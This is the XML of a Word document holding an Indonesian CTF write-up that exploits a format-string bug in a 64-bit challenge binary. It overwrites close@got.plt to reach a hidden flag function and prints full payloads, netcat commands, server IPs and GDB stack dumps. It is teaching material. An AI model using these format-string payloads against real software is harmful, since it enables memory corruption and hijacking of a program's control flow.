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ln4jq222bvz" w:id="0"/>
      <w:bookmarkEnd w:id="0"/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gqk8dvhyw6a" w:id="1"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Pwning - 100 points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ywmv4kxye44" w:id="2"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Soal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714285714283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Service: 128.199.174.161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714285714283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Port: 17866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714285714283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ASLR: Off - Ubuntu 14.04.5 LTS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42.85714285714283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*Tes Koneksi: #nc 128.199.174.161 17866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14285714283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337ab7"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                  <w:highlight w:val="white"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">gateway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5f5f5" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">6a7c0c11a51ff83518e876228dc45159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6vhzxd3l57l" w:id="3"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Solusi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Soal ini hampir sama persis dengan CTF Internetwache 2016 (Remote Printer)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bedanya yang ini versi 64-bit, stripped. Fungsi main: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__cdecl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argc,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argv,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envp)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v4;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rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">// [sp+Ch] [bp-14h]@1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v5;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rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">// [sp+10h] [bp-10h]@1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br w:type="textWrapping"/>
              <w:t xml:space="preserve">  setbuf(stdout,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);</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">  v4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  <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">  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"Selamat Datang Di -HOST GATEWAY-!"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);</w:t>
              <w:br w:type="textWrapping"/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"Masukkan Alamat IPv4 Tujuan:"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);</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">  __isoc99_scanf(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4197303LL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v5);</w:t>
              <w:br w:type="textWrapping"/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"Masukkan Port:"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v5);</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">  __isoc99_scanf(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4197323LL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v4);</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">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"Oke, mencoba terkoneksi %s:%d saat!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6622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v5, v4);</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">  SOKET(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v5, v4);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Fungsi SOKET @0x4009B5 (fungsi ini saya sendiri yang kasih nama):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__fastcall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SOKET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a1,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uint16_t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a2)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buf;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rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">// [sp+10h] [bp-2020h]@5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sockaddr addr;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rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">// [sp+2010h] [bp-20h]@3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0004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fd;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08080"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">// [sp+202Ch] [bp-4h]@1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br w:type="textWrapping"/>
              <w:t xml:space="preserve">  fd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socket(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( fd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)</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">  {</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">    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"Soket Tidak Terbentuk :("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(_DWORD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addr.sa_data[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inet_addr(a1);</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">    addr.sa_family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(_WORD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addr.sa_data[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htons(a2);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( connect(fd,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addr,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16u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)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( recv(fd,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buf,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8192uLL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)</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">      {</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">   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buf,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buf);</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">        close(fd);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t xml:space="preserve">      {</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">        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"Tidak Ada Data :("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br w:type="textWrapping"/>
              <w:t xml:space="preserve">    {</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">      perror(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"Tidak Ada Koneksi :(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6622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Terlihat vulnerability-nya adalah format string. Ada statemen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buf, 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buf)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (sepertinya IDA salah memberi argumen, karena kalau lihat di hasil disassembly cuma satu parameter, jadi seharusnya cuma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printf(buf)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Lihat lebih jauh di disassembly, ada “dead code” yang mencetak flag tapi tidak pernah dipanggil.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2988" cy="22821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282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 string vulnerability agak susah untuk mengontrol RIP, maka salah satu alternatif yang bisa dipakai adalah meng-overwrite satu fungsi di got.plt dengan alamat fungsi flag. Di program, setelah printf yang vulnerable dipanggil fungsi close(),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        printf(buf);</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">        close(fd);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Sehingga kita bisa meng-overwrite close@got.plt dengan alamat fungsi flag (0x400A98). Jadi saat program memanggil close(), yang akan dijalankan justru fungsi flag.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close@got.plt bisa di-overwrite karena program tidak RELRO, bisa dicek dengan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checksec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checksec --file gateway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RELRO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STACK CANARY      NX            PIE         ...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 RELRO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No canary found   NX disabled   No PIE      ...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Jadi tujuan kita adalah meng-overwrite memori pada alamat 0x601238 dengan nilai 0x400A98, dengan format string exploit.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0ra8s6rhxe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dci57jrsn9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cl789up4eda" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Mencari Indeks Format String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sini kita membuat payload-nya via netcat yang listen ke port tertentu, dan nanti program yang akan koneksi ke port tersebut.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echo -ne "AAAAAAAA_%lx.%lx.%lx.%lx.%lx.%lx.%lx.%lx.%lx.%lx" | nc -lvp 2222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AAAAAAAA_7ffff1a84f80.2000.ffffffffffffffff.0.0.8ae00000000.7ffff1a86fc0.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4141414141414141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.786c252e786c255f.786c252e786c252ea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Pola kita muncul di index 8.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hnc53lc1x5b" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Overwrite - Gagal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Pola umum untuk overwrite dengan format string adalah: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&lt;alamat_overwrite&gt;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rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">%&lt;nilai_overwrite_dalam_angka&gt;c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%&lt;index&gt;$n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Nilai 0x400A98 dalam desimal adalah: 4197016, dikurangi 8 untuk alamat overwrite jadi 4197008, sehingga payloadnya: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\x38\x12\x60\x00\x00\x00\x00\x00</w:t>
            </w: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rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">%4197008c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%8$n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kalau lewat terminal, tanda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</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> harus ditulis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\$</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> supaya tidak di-escape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Singkat cerita, itu tidak berhasil :( Memori pada alamat tersebut nilainya tetap tidak berubah setelah printf() tereksekusi (dicek pakai GDB). Tebakan saya adalah karena payload mengandung null character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\x00</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) sehingga printf tidak membaca keseluruhan payload.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 isi stack (setelah recv, sebelum masuk printf), dilihat dengan gdb-peda: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0000| 0x7fffffffbbd0 --&gt; 0x8ae00000000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0008| 0x7fffffffbbd8 --&gt; 0x7fffffffdc20 ("127.0.0.1")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0016| 0x7fffffffbbe0 --&gt;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0x601238 --&gt; 0x400786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# index 8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0024| 0x7fffffffbbe8 ("%4197008c%8$n")                            # index 9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0032| 0x7fffffffbbf0 --&gt; 0x6e24382563 ('c%8$n')                   # index 10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0040| 0x7fffffffbbf8 --&gt; 0x0                                      # index 11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0048| 0x7fffffffbc00 --&gt; 0x0                                      # index 12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0056| 0x7fffffffbc08 --&gt; 0x0                                      # index 13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eqjarjatwee" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Overwrite - Berhasil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Untuk mengatasi null char, bagaimana kalau alamat yang di-overwrite ditaruh belakang, tapi tentunya kali ini kita perlu karakter junk untuk padding ke belakang supaya alamat overwrite “ngepas” 8 byte di satu segmen stack, tidak tercampur dengan byte lain.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rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">%&lt;nilai_overwrite&gt;c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%&lt;index&gt;$n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&lt;padding&gt;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&lt;alamat_overwrite&gt;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Observasi lain adalah nilai yang hendak dioverwrite. Alamat close@plt yang akan ditimpa adalah </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">0x400786</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (lihat di susunan stack di atas,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0x601238 --&gt; 0x400786</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">). Sedangkan alamat fungsi flag kita adalah 0x400A98. Bisa dilihat bahwa sebenarnya kita hanya perlu mengubah 2 byte saja (dari 0786 menjadi 0A98). Maka supaya nilai overwritenya tidak terlalu besar, kita bisa gunakan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hn</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">” dalam format stringnya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 Nilai overwrite kita tadi adalah 0x0A98 atau 2712 dalam desimal.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rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">%2712c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%&lt;index&gt;$hn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&lt;padding&gt;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\x38\x12\x60\x00\x00\x00\x00\x00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Nilai index dan isi junk harus kita hitung lagi supaya alamat overwrite (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\x38\x12\x60\x00\x00\x00\x00\x00</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) ngepas di satu segmen stack. Misalnya saja padding kita: ABCDEFGHIJKLM dan index = 11 (ngasal dulu):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rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">%2712c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%11$hn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ABCDEFGHIJKLM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\x38\x12\x60\x00\x00\x00\x00\x00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Breakpoint sebelum printf, dan lihat isi stack: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1980"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="73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0000| 0x7fffffffbbd0 --&gt; 0x8ae00000000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0008| 0x7fffffffbbd8 --&gt; 0x7fffffffdc20 ("127.0.0.1")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0016| 0x7fffffffbbe0 ("%2712c%11$hnABCDEFGHIJKLM8\022`")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0024| 0x7fffffffbbe8 ("1$hnABCDEFGHIJKLM8\022`")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0032| 0x7fffffffbbf0 ("EFGHIJKLM8\022`")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0040| 0x7fffffffbbf8 --&gt; 0x6012384d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0048| 0x7fffffffbc00 --&gt; 0x0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0056| 0x7fffffffbc08 --&gt; 0x0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index 8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index 9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index 10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# index 11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index 12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# index 13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Perhatikan area merah, indexnya sudah benar sepertinya (11), tapi alamatnya masih ada “4d” di belakangnya. Berarti padding-nya terlalu banyak 1 huruf. Bisa kita kurangi huruf terakhir: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9900"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">%2712c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%11$hn</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="6aa84f"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">ABCDEFGHIJKL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\x38\x12\x60\x00\x00\x00\x00\x00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Hasilnya di stack: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0000| 0x7fffffffbbd0 --&gt; 0x8ae00000000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0008| 0x7fffffffbbd8 --&gt; 0x7fffffffdc20 ("127.0.0.1")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0016| 0x7fffffffbbe0 ("%2712c%11$hnABCDEFGHIJKL8\022`")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0024| 0x7fffffffbbe8 ("1$hnABCDEFGHIJKL8\022`")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0032| 0x7fffffffbbf0 ("EFGHIJKL8\022`")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0040| 0x7fffffffbbf8 --&gt; 0x601238 --&gt;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0x400786 (&lt;close@plt+6&gt;: push 0x6)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0048| 0x7fffffffbc00 --&gt; 0x0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0056| 0x7fffffffbc08 --&gt; 0x0 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Sudah benar isinya 0x601238. Lanjutkan next instruction sampai setelah printf tereksekusi, maka ini isi stack setelah printf tereksekusi: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0000| 0x7fffffffbbd0 --&gt; 0x8ae00000000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0008| 0x7fffffffbbd8 --&gt; 0x7fffffffdc20 ("127.0.0.1")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0016| 0x7fffffffbbe0 ("%2712c%11$hnABCDEFGHIJKL8\022`")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0024| 0x7fffffffbbe8 ("1$hnABCDEFGHIJKL8\022`")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0032| 0x7fffffffbbf0 ("EFGHIJKL8\022`")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  <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">0040| 0x7fffffffbbf8 --&gt; 0x601238 --&gt;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0"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">0x400a98 (push   rbp)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0048| 0x7fffffffbc00 --&gt; 0x0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0056| 0x7fffffffbc08 --&gt; 0x0 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Sekarang lihat bahwa alamat 0x601238 sudah tidak lagi menunjuk ke close@plt, tapi ke alamat flag kita 0x400a98. Kalau program dilanjutkan, ketika dia berusaha memanggil close@got.plt, dia akan diarahkan ke fungsi flag kita. Pwned…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ffs0asp14q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nfnwda0d4ug" w:id="10"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Pwn ke Remote Server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Jika tadi payload ada di localhost (127.0.0.1), sekarang harus dijalankan di suatu server. Misalnya di sini saya pakai server yang saya kelola (103.10.105.200).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server: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 echo -ne "%2712c%11\$hnABCDEFGHIJKL\x38\x12\x60\x00\x00\x00\x00\x00" | nc -l 2222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tempat lain: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 nc 128.199.174.161 17866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Selamat Datang Di -HOST GATEWAY-!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Masukkan Alamat IPv4 Tujuan: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103.10.105.200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Masukkan Port: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2222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Oke, mencoba terkoneksi 103.10.105.200:2222 saat!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0"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">�ABCDEFGHIJKL8`flag{format_masa_lalU}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Maka akan didapatkan flag yang kita tunggu-tunggu…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flag{format_masa_lalU}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  <w:font w:name="Droid Sans Mono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https://github.com/ctfs/write-ups-2016/tree/master/internetwache-ctf-2016/exploit/remote-printer-80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"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%n: menulis 4 byte, %hn: menulis 2 byte, %hhn: menulis 1 byte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tf.idsecconf.org/download?file_key=fc7912e3c3e7e60616cd9789552a6050f11065f0cc6d4f23d75a64cd41a782be&amp;team_key=2a3d00950bcec988c6f9a00242687028ade2e180c4a337d64a8761b253b2df59" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2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ctfs/write-ups-2016/tree/master/internetwache-ctf-2016/exploit/remote-printer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